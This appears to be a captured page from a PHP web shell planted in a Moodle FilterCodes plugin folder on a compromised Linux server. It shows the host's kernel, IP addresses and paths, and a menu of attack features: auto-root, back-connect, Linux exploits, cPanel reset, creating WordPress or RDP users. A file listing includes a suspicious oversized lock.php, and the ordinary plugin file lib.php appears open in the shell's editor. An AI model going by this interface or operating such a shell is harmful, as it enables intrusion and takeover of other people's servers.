Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.69.17.196
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
filter /
filtercodes /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
pix
[ DIR ]
drwxr-xr-x
settings
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
thirdparty
[ DIR ]
drwxr-xr-x
.gitignore
7.32
KB
-rw-r--r--
CHANGELOG.md
26.14
KB
-rw-r--r--
CODE_OF_CONDUCT.md
5.14
KB
-rw-r--r--
CONTRIBUTING.md
2.13
KB
-rw-r--r--
LICENSE.txt
31.71
KB
-rw-r--r--
README.md
120.03
KB
-rw-r--r--
SECURITY.md
137
B
-rw-r--r--
cloud.php
25.87
KB
-rw-r--r--
composer.json
684
B
-rw-r--r--
filter.php
1.11
KB
-rw-r--r--
lib.php
2.13
KB
-rw-r--r--
lock.php
358.07
KB
-rw-r--r--
phpcs.xml.dist
239
B
-rw-r--r--
settings.php
1.24
KB
-rw-r--r--
styles.css
1.89
KB
-rw-r--r--
thirdpartylibs.xml
246
B
-rw-r--r--
version.php
1.26
KB
-rw-r--r--
wishlist.php
2.71
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lib.php
<?php // This file is part of the FilterCodes plugin for Moodle - https://moodle.org/ // // FilterCodes is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // FilterCodes is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with FilterCodes. If not, see <https://www.gnu.org/licenses/>. /** * Library of functions for filtercodes. * * @package filter_filtercodes * @copyright 2016-2024 TNG Consulting Inc. (https://tngconsulting.ca) * @author Michael Milette * @license https://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ /** * Function to apply Moodle filters to custom menu. * @return string Empty string. */ function filter_filtercodes_render_navbar_output() { // Note: This function is only supported as of Moodle 3.2+ in themes based on Bootstrapbase and Boost. // If enabled in plugin settings. if (get_config('filter_filtercodes', 'enable_customnav')) { global $CFG, $PAGE; // Don't filter menus on Theme Settings page or it will filter the custommenuitems field in the page and loose the tags. if ($PAGE->pagetype != 'admin-setting-themesettings' && stripos($CFG->custommenuitems, '{') !== false) { // Don't apply auto-linking filters. $filtermanager = filter_manager::instance(); $filteroptions = ['originalformat' => FORMAT_HTML, 'noclean' => true]; $skipfilters = ['activitynames', 'data', 'glossary', 'sectionnames', 'bookchapters']; // Filter Custom Menu. $CFG->custommenuitems = $filtermanager->filter_text( $CFG->custommenuitems, $PAGE->context, $filteroptions, $skipfilters ); } } return ''; }
Close